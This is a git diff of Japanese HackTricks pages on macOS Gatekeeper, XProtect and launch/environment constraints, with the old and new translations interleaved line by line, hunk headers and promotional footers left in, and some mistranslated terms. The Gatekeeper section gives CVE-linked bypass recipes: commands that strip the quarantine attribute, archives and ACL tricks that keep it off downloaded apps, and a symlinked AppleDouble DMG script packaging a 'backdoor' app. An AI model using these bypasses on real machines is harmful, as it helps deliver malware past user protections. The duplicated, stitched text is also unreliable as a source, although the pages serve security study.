ただし、サンドボックス化されたファイルは、作成されすべてのファイルにこの属性が設定されます。サンドボックス化されていないアプリケーションは、自分で設定するか、**Info.plist**で[**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information\_property\_list/lsfilequarantineenabled?language=objc)キーを指定することで、システムが作成されたファイルに`com.apple.quarantine`拡張属性を設定するようにできます。
{% endhint %}
その状態を**確認し、有効/無効にする**ことが可能ですrootが必要です
その状態を**確認**し、有効化/無効化することが可能です(ルート権限が必要です):
```bash
spctl --status
assessments enabled
@ -174,17 +174,13 @@ spctl --enable
spctl --disable
#You can also allow nee identifies to execute code using the binary "spctl"
```
You can also **ファイルに検疫拡張属性があるかどうかを確認する** with:
次のコマンドを使用して、ファイルに拡張属性があるかどうかを確認できます:
```bash
xattr file.png
com.apple.macl
com.apple.quarantine
```
```
xattr -l /path/to/application
```
これにより、アプリケーションに関連付けられた拡張属性の値を確認し、隔離属性を書き込んだアプリを特定できます。
**拡張属性**の**値**をチェックし、quarantine属性を書き込んだアプリを特定します。
```bash
xattr -l portada.png
com.apple.macl:
@ -200,11 +196,11 @@ com.apple.quarantine: 00C1;607842eb;Brave;F643CD5F-6071-46AB-83AB-390BA944DEC5
# Brave -- App
# F643CD5F-6071-46AB-83AB-390BA944DEC5 -- UID assigned to the file downloaded
```
実際にはプロセスは「作成したファイルに検疫フラグを設定することができる作成したファイルにUSER\_APPROVEDフラグを適用しようとしましたが、適用されませんでした
実際にプロセスは「作成するファイルにクォータンティンフラグを設定できる可能性があります作成したファイルにUSER\_APPROVEDフラグを適用しようとしましたが、適用されませんでした:
<details>
<summary>検疫フラグを適用するソースコード</summary>
<summary>ソースコード クォータンティンフラグの適用</summary>
```c
#include <stdio.h>
#include <stdlib.h>
@ -266,58 +262,35 @@ return 0;
```
</details>
そして、その属性を**削除**するには:
そして、次のようにその属性を**削除**します:
```bash
xattr -d com.apple.quarantine portada.png
#You can also remove this attribute from every file with
find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine
```
```
xattr -r ~/Downloads
```
macOSのGatekeeperは、インターネットからダウンロードされたアプリケーションやソフトウェアをチェックし、信頼できる開発者からのものであるか、Appleによって認証されたものであるかを確認します。これにより、マルウェアのインストールを防ぐことができます。しかし、Gatekeeperは完璧ではありません。悪意のあるアクターは、この保護を回避する方法を見つけることがあります。
Gatekeeperの設定は、システム環境設定の「セキュリティとプライバシー」セクションで管理できます。ユーザーは、App Storeからのアプリのみを許可する、App Storeと認証された開発者からのアプリを許可する、またはどこからでもアプリを許可する、という選択肢があります。
Gatekeeperは、ダウンロードしたファイルに「隔離」属性を付与することで機能します。この属性は、ファイルがインターネットから来たことを示し、ユーザーがそれを開く前に警告を表示します。隔離されたファイルは、以下のコマンドで見つけることができます
そして、次のコマンドで隔離されたすべてのファイルを検索します:
{% code overflow="wrap" %}
```
xattr -r ~/Downloads
```
このコマンドは、ダウンロードフォルダ内のすべてのファイルに設定されている拡張属性を再帰的にリストします。隔離属性は、`com.apple.quarantine`として表示されます。
Gatekeeperを回避する一般的な方法は、`xattr`コマンドを使用して隔離属性を削除することです。これにより、Gatekeeperの警告なしでファイルを開くことができます。ただし、これはセキュリティリスクを高めるため、注意が必要です。
Gatekeeperの保護を強化するためには、以下のような追加のステップを踏むことが推奨されます
- システム環境設定で、App Storeからのアプリのみを許可する設定を選択する。
- 不明な開発者からのアプリケーションをインストールする前に、その信頼性を確認する。
- 定期的にソフトウェアアップデートを行い、セキュリティパッチを適用する。
Gatekeeperは有用なセキュリティ機能ですが、ユーザーは他のセキュリティ対策と組み合わせて使用することが重要です。
```bash
find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine"
```
{% endcode %}
隔離情報は、**`~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`** にあるLaunchServicesが管理する中央データベースにも保存されます
**Quarantine情報**は、LaunchServicesによって管理される中央データベースに保存されます。**`~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**。
#### **Quarantine.kext**
カーネル拡張は、**システム上のカーネルキャッシュを通じてのみ利用可能**ですが、**https://developer.apple.com/** から**カーネルデバッグキット**をダウンロードすることができ、シンボリケートされた拡張のバージョンが含まれています。
このカーネル拡張機能は、システムの**カーネルキャッシュ**を介してのみ利用可能です。ただし、**https://developer.apple.com/** から**Kernel Debug Kit**をダウンロードすることで、この拡張機能のシンボル化バージョンを入手できます。
### XProtect
XProtectはmacOSに組み込まれた**アンチマルウェア**機能です。XProtectは、アプリケーションが初めて起動されたり変更されたりした際に、既知のマルウェアや安全でないファイルタイプのデータベース**照合します**。Safari、Mail、Messagesなどの特定のアプリを通じてファイルをダウンロードすると、XProtectは自動的にファイルをスキャンします。データベースにある既知のマルウェアと一致した場合、XProtectは**ファイルの実行を防ぎ**、脅威について警告します。
XProtectはmacOSに組み込まれた**対マルウェア**機能です。XProtectは、**アプリケーションが初めて起動されるか変更される際に、既知のマルウェアや安全でないファイルタイプのデータベース**と照合します。Safari、Mail、Messagesなどの特定のアプリを介してファイルをダウンロードすると、XProtectが自動的にファイルをスキャンします。データベース内の既知のマルウェアと一致する場合、XProtectはファイルの実行を**防止**し、脅威を警告します。
XProtectデータベースはAppleによって新しいマルウェア定義で**定期的に更新**され、これらの更新は自動的にダウンロードされてMacにインストールされます。これにより、XProtectは常に最新の既知の脅威に対応しています。
XProtectデータベースはAppleによって**定期的に更新**され、これらの更新は自動的にMacにダウンロードされてインストールされます。これにより、XProtectが常に最新の既知の脅威に対応していることが保証されます。
ただし、**XProtectは完全な機能を持つアンチウイルスソリューションではない**ことに注意が必要です。特定の既知の脅威リストのみをチェックし、ほとんどのアンチウイルスソフトウェアのようなオンアクセススキャンは実行しません。
ただし、XProtectは**完全なアンチウイルスソリューションではない**ことに注意する価値があります。特定の既知の脅威のリストのみをチェックし、ほとんどのアンチウイルスソフトウェアのようにアクセス時スキャンを実行しません。
最新のXProtectアップデートに関する情報を取得するには
最新のXProtect更新情報を取得するには、次のコマンドを実行します
{% code overflow="wrap" %}
```bash
@ -325,75 +298,73 @@ system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistC
```
{% endcode %}
XProtectは、SIP保護された場所である **`/Library/Apple/System/Library/CoreServices/XProtect.bundle`** に位置しており、バンドル内にはXProtectが使用する情報があります
XProtectは、SIP保護された場所にあります。**/Library/Apple/System/Library/CoreServices/XProtect.bundle** で、XProtectが使用する情報が含まれています:
* **`XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist`**: これらのcdhashesを持つコードがレガシー権限を使用できるようにします。
* **`XProtect.bundle/Contents/Resources/XProtect.meta.plist`**: BundleIDとTeamIDによってロードが許可されないプラグインや拡張機能のリスト、または最小バージョンを示します。
* **`XProtect.bundle/Contents/Resources/XProtect.meta.plist`**: BundleIDとTeamIDを介してロードが禁止されているプラグインと拡張機能のリスト、または最小バージョンを示します。
* **`XProtect.bundle/Contents/Resources/XProtect.yara`**: マルウェアを検出するためのYaraルール。
* **`XProtect.bundle/Contents/Resources/gk.db`**: ブロックされたアプリケーションとTeamIDsのハッシュを含むSQLite3データベース。
* **`XProtect.bundle/Contents/Resources/gk.db`**: ブロックされたアプリケーションとTeamIDのハッシュを持つSQLite3データベース。
**`/Library/Apple/System/Library/CoreServices/XProtect.app`** にはGatekeeperプロセスに関与しないXProtectに関連する別のアプリがあることに注意してください
XProtectに関連するもう1つのAppが存在することに注意してください。**`/Library/Apple/System/Library/CoreServices/XProtect.app`** はGatekeeperプロセスとは関係ありません
### Gatekeeperではない
{% hint style="danger" %}
Gatekeeperはアプリケーションを実行する**毎回実行されるわけではない**ことに注意してください。_**AppleMobileFileIntegrity**_ (AMFI)は、Gatekeeperによって既に実行および検証されたアプリを実行する際にのみ、**実行可能コードの署名を検証**します。
Gatekeeperは、アプリケーションを実行するたびに実行されるわけではありません。_**AppleMobileFileIntegrity**_ (AMFI) は、Gatekeeperによってすでに実行および検証されたアプリケーションを実行するときにのみ、**実行可能コードの署名を検証**します。
{% endhint %}
したがって、以前はGatekeeperでキャッシュした後にアプリケーションの実行可能でないファイルElectron asarやNIBファイルなどを**変更**し、他の保護がない場合、アプリケーションは**悪意のある**追加物とともに**実行**されました。
したがって、以前はアプリケーションを実行してGatekeeperでキャッシュすることが可能で、その後、アプリケーションの**実行不可能なファイル**Electron asarやNIBファイルなどを変更し、他に保護がない場合、アプリケーションは**悪意のある**追加で**実行**されていました。
しかし、現在はmacOSがアプリケーションバンドル内のファイルの**変更を防ぐ**ため、これは不可能です。[Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md)攻撃を試みると、Gatekeeperでキャッシュした後にバンドルを変更することはできないことがわかります。例えば、Contentsディレクトリの名前をNotConに変更しエクスプロイトで示されているように、Gatekeeperでキャッシュするためにアプリのメインバイナリを実行すると、エラーが発生し実行されません。
しかし、現在はmacOSがアプリケーションバンドル内のファイルを**変更できないように防止**しています。そのため、[Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md)攻撃を試みると、Gatekeeperでキャッシュするためにアプリケーションを実行した後、バンドルを変更できなくなるため、悪用することができなくなります。例えば、Contentsディレクトリの名前をExploitで示されているようにNotConに変更し、その後アプリケーションのメインバイナリを実行してGatekeeperでキャッシュしようとすると、エラーが発生して実行されません。
## Gatekeeperのバイパス
Gatekeeperをバイパスする方法ユーザーが何かをダウンロードして実行することをGatekeeperが禁止すべき場合は、macOSの脆弱性と見なされます。これらは、過去にGatekeeperをバイパスすることを可能にした技術に割り当てられたCVEです
Gatekeeperをバイパスする方法ユーザーに何かをダウンロードさせ、Gatekeeperが拒否すべきときに実行させる方法は、macOSの脆弱性と見なされます。これまでにGatekeeperをバイパスするための技術に割り当てられたいくつかのCVEがあります:
### [CVE-2021-1810](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)
**Archive Utility**によって抽出された場合、886文字を超えるファイル**パスはcom.apple.quarantine拡張属性を継承しないため、そのファイルに対してGatekeeperを**バイパスすることが可能でした
**Archive Utility**を使用してファイルを抽出すると、**886文字を超えるパス**を持つファイルにはcom.apple.quarantine拡張属性が付与されません。この状況により、これらのファイルがGatekeeperのセキュリティチェックを**回避**することができます
詳細については、[**元のレポート**](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)を確認してください。
詳細については、[**元のレポート**](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)を参照してください。
### [CVE-2021-30990](https://ronmasas.com/posts/bypass-macos-gatekeeper)
**Automator**で作成されたアプリケーションの場合、実行に必要な情報は実行可能ファイルではなく`application.app/Contents/document.wflow`内にあります。実行可能ファイルは、**Automator Application Stub**と呼ばれる一般的なAutomatorバイナリです。
**Automator**で作成されたアプリケーションでは、実行に必要な情報が`application.app/Contents/document.wflow`に含まれており、実行可能ファイルには含まれていません。実行可能ファイルは、**Automator Application Stub**と呼ばれる汎用のAutomatorバイナリです。
したがって、`application.app/Contents/MacOS/Automator\ Application\ Stub`をシステム内の別の**Automator Application Stubへのシンボリックリンクで指す**ことができ、それは`document.wflow`内のものあなたのスクリプトを実行します。実際の実行可能ファイルには隔離xattrがないため、**Gatekeeperをトリガーしません**。&#x20;
したがって、`application.app/Contents/MacOS/Automator\ Application\ Stub`を別のシステム内のAutomator Application Stubにシンボリックリンクさせることで、`document.wflow`スクリプト内の内容を実行し、実際の実行可能ファイルにはquarantine xattrがないため、Gatekeeperをトリガーせずに実行できます。
予想される場所の例:`/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`
期待される場所の例: `/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`
詳細については、[**元のレポート**](https://ronmasas.com/posts/bypass-macos-gatekeeper)を確認してください。
詳細については、[**元のレポート**](https://ronmasas.com/posts/bypass-macos-gatekeeper)を参照してください。
### [CVE-2022-22616](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/)
このバイパスでは、`application.app`ではなく`application.app/Contents`から圧縮を開始するアプリケーションを含むzipファイルが作成されました。したがって、**隔離属性**は`application.app/Contents`の**すべてのファイルに**適用されましたが、**`application.app`には適用されませんでした**。Gatekeeperがチェックしていたのは`application.app`であるため、`application.app`がトリガーされたときに**隔離属性がなかったため**、Gatekeeperはバイパスされました。
このバイパスでは、zipファイルが`application.app`ではなく`application.app/Contents`から圧縮を開始するように作成されました。そのため、**quarantine属性**が**`application.app/Contents`内のすべてのファイル**に適用されましたが、**`application.app`**には適用されず、Gatekeeperがチェックしていたのはこれでした。そのため、`application.app`がトリガーされたときには**quarantine属性が存在しなかった**ため、Gatekeeperがバイパスされました。
```bash
zip -r test.app/Contents test.zip
```
詳細については、[**元のレポート**](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/)をご覧ください。
チェックして、より詳しい情報を入手してください。
### [CVE-2022-32910](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32910)
コンポーネントが異なるにもかかわらず、この脆弱性の悪用は前述のものと非常に似ています。このケースでは、**`application.app/Contents`** からApple Archiveを生成するので、**Archive Utility** によって解凍された時に **`application.app`** は隔離属性を受け取らないでしょう
コンポーネントが異なる場合でも、この脆弱性の悪用は前回のものと非常に似ています。この場合、**`application.app/Contents`** から Apple Archive を生成し、**Archive Utility** によって展開される際に **`application.app` には隔離属性が付与されない**ようにします
```bash
aa archive -d test.app/Contents -o test.app.aar
```
詳細については、[**オリジナルのレポート**](https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/)をご覧ください。
チェックして、より詳しい情報を入手してください。
### [CVE-2022-42821](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/)
ACLの**`writeextattr`**は、ファイルに属性を書き込むことを誰にも防ぐために使用できます:
ACL **`writeextattr`** は、ファイルの属性の書き込みを誰もができないようにするために使用できます。
```bash
touch /tmp/no-attr
chmod +a "everyone deny writeextattr" /tmp/no-attr
xattr -w attrname vale /tmp/no-attr
xattr: [Errno 13] Permission denied: '/tmp/no-attr'
```
さらに、**AppleDouble** ファイル形式は、ACEを含むファイルのコピーを作成します。
さらに、**AppleDouble**ファイル形式は、そのACEを含むファイルをコピーします。
[**ソースコード**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html)では、xattr **`com.apple.acl.text`** に保存されたACLのテキスト表現が解凍されたファイルのACLとして設定されることがわかります。したがって、他のxattrが書き込まれることを防ぐACLを持つアプリケーションを**AppleDouble** ファイル形式でzipファイルに圧縮した場合...隔離xattrはアプリケーションに設定されませんでした
{% code overflow="wrap" %}
[**ソースコード**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html)では、xattr内に格納されたACLテキスト表現が**`com.apple.acl.text`**と呼ばれることがわかります。これは、展開されたファイルにACLとして設定されます。したがって、ACLを設定して他のxattrの書き込みを防止するACLを持つzipファイルにアプリケーションを圧縮した場合...クォリンティンxattrはアプリケーションに設定されませんでした
```bash
chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
@ -402,9 +373,9 @@ python3 -m http.server
```
{% endcode %}
詳細については、[**オリジナルのレポート**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/)をごください。
詳細については、[**のレポート**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/)をご確認ください。
これはAppleArchivesを利用しても悪用される可能性があります
AppleArchivesでもこの脆弱性を悪用することができる可能性があります。
```bash
mkdir app
touch app/test
@ -413,13 +384,11 @@ aa archive -d app -o test.aar
```
### [CVE-2023-27943](https://blog.f-secure.com/discovery-of-gatekeeper-bypass-cve-2023-27943/)
**Google ChromeがmacOSの内部問題のためにダウンロードしたファイルに検疫属性を設定していなかった**ことが発見されました。
**Google Chromeは、macOSの内部問題のためにダウンロードされたファイルにquarantine属性を設定していないことが発見されました。**
### [CVE-2023-27951](https://redcanary.com/blog/gatekeeper-bypass-vulnerabilities/)
AppleDoubleファイル形式は、`._`で始まる別のファイルにファイルの属性を保存し、これにより**macOSマシン間で**ファイル属性をコピーするのに役立ちます。しかし、AppleDoubleファイルを解凍した後、`._`で始まるファイルに**検疫属性が与えられていない**ことが指摘されました。
{% code overflow="wrap" %}
AppleDoubleファイル形式は、ファイルの属性を`._`で始まる別のファイルに保存し、これによりmacOSマシン間でファイル属性をコピーするのに役立ちます。しかし、AppleDoubleファイルを展開した後、`._`で始まるファイルにquarantine属性が設定されていないことがわかりました。
```bash
mkdir test
echo a > test/a
@ -431,8 +400,7 @@ aa archive -d test/ -o test.aar
```
{% endcode %}
検疫属性が設定されていないファイルを作成できることで、**Gatekeeperをバイパスすることが可能でした。** このトリックは、AppleDoubleの命名規則を使用して`._`で始まる)**DMGファイルアプリケーションを作成し**、検疫属性のないこの隠しファイルへの**可視ファイルをシンボリックリンクとして作成する**ことでした。\
**dmgファイルが実行されると**、検疫属性がないため**Gatekeeperをバイパスします**。
**Gatekeeper**をバイパスすることが可能でした。トリックは、AppleDouble名前規則を使用して`._`で始める、quarantine属性が設定されていない隠しファイルを作成し、この隠しファイルへのシンボリックリンクとして**見えるファイルを作成するDMGファイルアプリケーション**を作成することでした。**dmgファイルが実行されると**、quarantine属性がないため、**Gatekeeperをバイパス**します。
```bash
# Create an app bundle with the backdoor an call it app.app
@ -448,20 +416,6 @@ ln -s ._app.dmg s/app/app.dmg
echo "[+] compressing files"
aa archive -d s/ -o app.aar
```
### クォランティン xattr の防止
### Quarantine xattrの防止
".app" バンドルにクォランティン xattr が追加されていない場合、実行時に **Gatekeeper はトリガーされません**
<details>
<summary><strong>AWS ハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
HackTricks をサポートする他の方法:
* **HackTricks にあなたの会社を広告したい**、または **HackTricks を PDF でダウンロードしたい** 場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式 PEASS & HackTricks グッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFT**](https://opensea.io/collection/the-peass-family) コレクションをチェックする
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) を **フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の GitHub リポジトリに PR を提出して、あなたのハッキングのコツを **共有する**
</details>
".app"バンドルにQuarantine xattrが追加されていない場合、それを実行しても**Gatekeeperはトリガーされません**。

123
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md
View file

@ -1,14 +1,14 @@
# macOSの起動/環境制約
# macOS ランチ/環境制約とトラストキャッシュ
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで企業を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
* **ハッキングトリックを共有するには、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
*
* .
@ -16,42 +16,42 @@
## 基本情報
macOSの起動制約は、**プロセスの開始方法、実行者、および場所を制御**することでセキュリティを強化するために導入されました。macOS Venturaで導入され、システムバイナリを異なる制約カテゴリに分類する**信頼キャッシュ**内で定義される制約フレームワークを提供します。これらの制約はシステム内のすべての実行可能バイナリに適用され、特定のバイナリを起動するための要件を規定する**ルール**のセットを含みます。これらのルールには、バイナリが満たす必要がある自己制約、親プロセスが満たす必要がある親制約、および他の関連エンティティが守る必要がある責任制約が含まれます。
macOSのランチ制約は、**プロセスの開始方法、誰が、どこからプロセスを開始できるか**を規制することでセキュリティを強化するために導入されました。macOS Venturaで導入され、**各システムバイナリを異なる制約カテゴリに分類**するフレームワークを提供し、それらは**トラストキャッシュ**内に定義されたシステムバイナリとそれに対応するハッシュを含むリストを提供します。これらの制約は、システム内のすべての実行可能なバイナリに適用され、特定のバイナリを起動するための**要件を明確にする**一連の**ルール**を含みます。これらのルールには、バイナリが満たす必要がある自己制約、親プロセスが満たす必要がある親制約、および他の関連エンティティが守る必要がある責任制約が含まれます。
このメカニズムは、macOS Sonomaからはサードパーティのアプリにも**環境制約**を適用することができます。これにより、開発者はアプリを保護するために**環境制約のキーと値のセット**を指定することができます
このメカニズムは、macOS Sonomaから**環境制約**を介してサードパーティアプリケーションにも拡張され、開発者が**環境制約のためのキーと値のセットを指定**することでアプリを保護できるようになりました
起動環境とライブラリの制約は、**`launchd`プロパティリストファイル**に保存するか、**コードサイニングで使用する別のプロパティリスト**ファイルに保存します。
**ランチ環境とライブラリ制約**は、**`launchd`プロパティリストファイル**に保存するか、**コードサイニングで使用する別のプロパティリスト**ファイルに保存します。
制約には4つのタイプがあります:
制約には4種類あります:
* **自己制約****実行中の**バイナリに適用される制約。
* **親プロセス制約****プロセスの**に適用される制約(たとえば**`launchd`**がXPサービスを実行している場合
* **責任制約**XPC通信でサービスを呼び出す**プロセスに適用**される制約。
* **親プロセス**:プロセスの**に適用される**制約(たとえば**`launchd`**がXPサービスを実行している場合
* **責任制約**XPC通信でサービスを呼び出すプロセスに適用される制約。
* **ライブラリロード制約**:ロードできるコードを選択的に記述するためにライブラリロード制約を使用します。
したがって、プロセスが別のプロセスを起動しようとする場合(`execve(_:_:_:)`または`posix_spawn(_:_:_:_:_:_:)`を呼び出すことによって)、オペレーティングシステムは**実行可能ファイルが自己制約を満たしているかどうか**をチェックします。また、**親プロセスの実行可能ファイルが実行可能ファイルの親制約を満たしているか**、および**責任プロセスの実行可能ファイルが実行可能ファイルの責任制約を満たしているか**をチェックします。これらの起動制約のいずれかが満たされていない場合、オペレーティングシステムはプログラムを実行しません。
したがって、プロセスが別のプロセスを起動しようとするとき(`execve(_:_:_:)`または`posix_spawn(_:_:_:_:_:_:)`を呼び出すことにより)、オペレーティングシステムは、**実行可能ファイルが自己制約を満たしているかどうか**をチェックします。また、**親プロセスの実行可能ファイルが実行可能ファイルの親制約を満たしているか**、および**責任プロセスの実行可能ファイルが実行可能ファイルの責任プロセス制約を満たしているか**をチェックします。これらのランチ制約のいずれかが満たされていない場合、オペレーティングシステムはプログラムを実行しません。
ライブラリをロードする際に、ライブラリ制約の**いずれかの部分が真ではない**場合、プロセスはライブラリを**ロードしません**。
ライブラリをロードする際に**ライブラリ制約の一部が真でない**場合、プロセスは**ライブラリをロードしません**。
## LCカテゴリ
## LC カテゴリ
LCは、**事実**と**論理演算**and、orなどから構成されるもので、事実を組み合わせます。
LCは、**事実**と**論理演算**and、orなどで構成され、事実を組み合わせます。
[**LCが使用できる事実は文書化されています**](https://developer.apple.com/documentation/security/defining\_launch\_environment\_and\_library\_constraints)。えば:
[**LCが使用できる事実は文書化されています**](https://developer.apple.com/documentation/security/defining\_launch\_environment\_and\_library\_constraints)。たとえば:
* is-init-proc実行可能ファイルがオペレーティングシステムの初期化プロセス`launchd`)であるかどうかを示すブール値。
* is-sip-protected実行可能ファイルがSystem Integrity ProtectionSIPによって保護されたファイルであるかどうかを示すブール値。
* `on-authorized-authapfs-volume:`:オペレーティングシステムが認可された、認証済みのAPFSボリュームから実行可能ファイルをロードしたかどうかを示すブール値。
* `on-authorized-authapfs-volume`:オペレーティングシステムが認可された、認証済みのAPFSボリュームから実行可能ファイルをロードしたかどうかを示すブール値。
* is-init-proc実行可能ファイルがオペレーティングシステムの初期化プロセス`launchd`)である必要があるかどうかを示すブール値。
* is-sip-protectedSystem Integrity ProtectionSIPによって保護されたファイルである必要があるかどうかを示すブール値。
* `on-authorized-authapfs-volume:`:オペレーティングシステムが認証されたAPFSボリュームから実行可能ファイルを読み込んだかどうかを示すブール値。
* `on-authorized-authapfs-volume`:オペレーティングシステムが認証されたAPFSボリュームから実行可能ファイルを読み込んだかどうかを示すブール値。
* Cryptexesボリューム
* `on-system-volume:`:オペレーティングシステムが現在起動しているシステムボリュームから実行可能ファイルをロードしたかどうかを示すブール値。
* `on-system-volume:`:オペレーティングシステムが現在起動しているシステムボリュームから実行可能ファイルを読み込んだかどうかを示すブール値。
* /System内部...
* ...
Appleのバイナリが署名されると、それは**信頼キャッシュ**内の**LCカテゴリ**に割り当てられます。
Appleバイナリが署名されると、**トラストキャッシュ**内の**LCカテゴリ**に割り当てられます。
* **iOS 16のLCカテゴリ**は[**ここで逆向きにドキュメント化されています**](https://gist.github.com/LinusHenze/4cd5d7ef057a144cda7234e2c247c056)。
* 現在の**LCカテゴリmacOS 14** - Somonaは逆向きになっており、[**ここで説明が見つかります**](https://gist.github.com/theevilbit/a6fef1e0397425a334d064f7b6e1be53)。
* **iOS 16 LCカテゴリ**は[**こちらで逆コンパイルされ文書化されています**](https://gist.github.com/LinusHenze/4cd5d7ef057a144cda7234e2c247c056)。
* 現在の**LCカテゴリmacOS 14** - Somonaは逆コンパイルされ、[**こちらで説明が見つかります**](https://gist.github.com/theevilbit/a6fef1e0397425a334d064f7b6e1be53)。
たとえば、カテゴリ1は
```
@ -59,18 +59,18 @@ Category 1:
Self Constraint: (on-authorized-authapfs-volume || on-system-volume) && launch-type == 1 && validation-category == 1
Parent Constraint: is-init-proc
```
* `(on-authorized-authapfs-volume || on-system-volume)`: システムまたはCryptexesボリュームにある必要があります。
* `(on-authorized-authapfs-volume || on-system-volume)`: システムまたはCryptexesボリュームにある必要があります。
* `launch-type == 1`: システムサービスである必要がありますLaunchDaemons内のplist
* `validation-category == 1`: オペレーティングシステムの実行可能ファイルです
* `validation-category == 1`: オペレーティングシステムの実行可能ファイル。
* `is-init-proc`: Launchd
### LCカテゴリの逆向き解析
### LCカテゴリのリバースエンジニアリング
詳細については[こちら](https://theevilbit.github.io/posts/launch\_constraints\_deep\_dive/#reversing-constraints)を参照してくださいが、基本的にはこれらは**AMFIAppleMobileFileIntegrity**で定義されているため、**KEXT**を取得するためにカーネル開発キットをダウンロードする必要があります。**`kConstraintCategory`**で始まるシンボルが興味深いものです。これらを抽出すると、デコードする必要があるDERASN.1)エンコードされたストリームが得られます。[ASN.1 Decoder](https://holtstrom.com/michael/tools/asn1decoder.php)またはpython-asn1ライブラリとその`dump.py`スクリプト、[andrivet/python-asn1](https://github.com/andrivet/python-asn1/tree/master)を使用して、より理解しやすい文字列を取得できます。
詳細は[**こちら**](https://theevilbit.github.io/posts/launch\_constraints\_deep\_dive/#reversing-constraints)にありますが、基本的に、これらは**AMFIAppleMobileFileIntegrity**で定義されているため、**KEXT**を取得するためにKernel Development Kitをダウンロードする必要があります。 **`kConstraintCategory`**で始まるシンボルが**興味深い**ものです。これらを抽出すると、ASN.1でエンコードされたストリームが得られます。これを[ASN.1デコーダ](https://holtstrom.com/michael/tools/asn1decoder.php)やpython-asn1ライブラリとその`dump.py`スクリプト、[andrivet/python-asn1](https://github.com/andrivet/python-asn1/tree/master)を使用してデコードする必要があります。これにより、より理解しやすい文字列が得られます。
## 環境制約
これらは**サードパーティのアプリケーション**で設定された起動制約です。開発者は、アプリケーションへのアクセスを制限するために、自身のアプリケーションで使用する**事実**と**論理演算子**を選択できます。
